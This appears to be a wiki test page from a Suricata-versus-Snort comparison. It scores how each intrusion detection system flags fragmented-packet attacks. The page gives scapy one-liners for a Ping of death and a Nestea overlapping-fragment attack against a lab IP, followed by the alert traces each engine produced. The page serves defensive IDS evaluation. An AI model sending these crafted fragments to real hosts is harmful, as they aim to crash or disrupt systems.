Suricata-vs-snort/Test-cases/Fragmented-packets

From aldeid
Jump to navigation Jump to search
You are here:
Fragmented packets

Synthesis

Test Suricata Snort
Ping of death 0 1
Nestea attack 1 1
TOTAL 1 2

Ping of death

  • Test: Ping of death
  • Payload (scapy):
send( fragment(IP(dst="192.168.100.35")/ICMP()/("X"*60000)) )
  • Suricata trace:
03/10/2011-13:55:12.825014 [**] [1:384:5] ICMP PING [**] [Classification: Misc activity] [Priority: 3] {ICMP} 192.168.100.37:8 -> 192.168.100.35:0
03/10/2011-13:55:13.512259 [**] [1:408:5] ICMP Echo Reply [**] [Classification: Misc activity] [Priority: 3] {ICMP} 192.168.100.35:0 -> 192.168.100.37:0
  • Suricata score: 0
  • Snort trace:
[**] [123:8:1] (spp_frag3) Fragmentation overlap [**]
[Classification: Generic Protocol Command Decode] [Priority: 3] 
04/20-09:32:06.820435 192.168.100.45 -> 192.168.100.48
ICMP TTL:64 TOS:0x0 ID:1 IpLen:20 DgmLen:828
Frag Offset: 0x1CE8   Frag Size: 0x0328
  • Snort score: 1

Nestea attack

  • Test: Nestea attack
  • Payload (scapy):
send(IP(dst="192.168.100.35", id=42, flags="MF")/UDP()/("X"*10))
send(IP(dst="192.168.100.35", id=42, frag=48)/("X"*116))
send(IP(dst="192.168.100.35", id=42, flags="MF")/UDP()/("X"*224))
  • Suricata trace:
03/10/2011-13:58:00.924783 [**] [1:2009702:4] ET POLICY DNS Update From External net [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {UDP} 192.168.100.37:53 -> 192.168.100.35:53
03/10/2011-13:58:30.921484 [**] [1:410:5] ICMP Fragment Reassembly Time Exceeded [**] [Classification: Misc activity] [Priority: 3] {ICMP} 192.168.100.35:11 -> 192.168.100.37:1
03/10/2011-13:58:47.715668 [**] [1:2009702:4] ET POLICY DNS Update From External net [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {UDP} 192.168.100.37:53 -> 192.168.100.35:53
  • Suricata score: 1
  • Snort trace:
[**] [123:3:1] (spp_frag3) Short fragment, possible DoS attempt [**]
[Classification: Generic Protocol Command Decode] [Priority: 3] 
04/20-09:33:07.433934 192.168.100.45 -> 192.168.100.48
UDP TTL:64 TOS:0x0 ID:42 IpLen:20 DgmLen:38 MF
Frag Offset: 0x0000   Frag Size: 0x0012

[**] [1:410:5] ICMP Fragment Reassembly Time Exceeded [**]
[Classification: Misc activity] [Priority: 3] 
04/20-09:33:37.430948 192.168.100.48 -> 192.168.100.45
ICMP TTL:64 TOS:0xC0 ID:38314 IpLen:20 DgmLen:64
Type:11  Code:1  TTL EXCEEDED TIME EXCEEDED IN FRAG REASSEMBLY
** ORIGINAL DATAGRAM DUMP:
192.168.100.45:53 -> 192.168.100.48:53
UDP TTL:64 TOS:0x0 ID:42 IpLen:20 DgmLen:38 MF
Len: 10  Csum: 64503
(8 more bytes of original packet)
** END OF DUMP

[**] [123:8:1] (spp_frag3) Fragmentation overlap [**]
[Classification: Generic Protocol Command Decode] [Priority: 3] 
04/20-09:33:52.409799 192.168.100.45 -> 192.168.100.48
UDP TTL:64 TOS:0x0 ID:42 IpLen:20 DgmLen:252 MF
Frag Offset: 0x0000   Frag Size: 0x00E8
  • Snort score: 1

Comments

Talk:Suricata-vs-snort/Test-cases/Fragmented-packets

Retrieved from "https://www.aldeid.com/w/index.php?title=Suricata-vs-snort/Test-cases/Fragmented-packets&oldid=22252"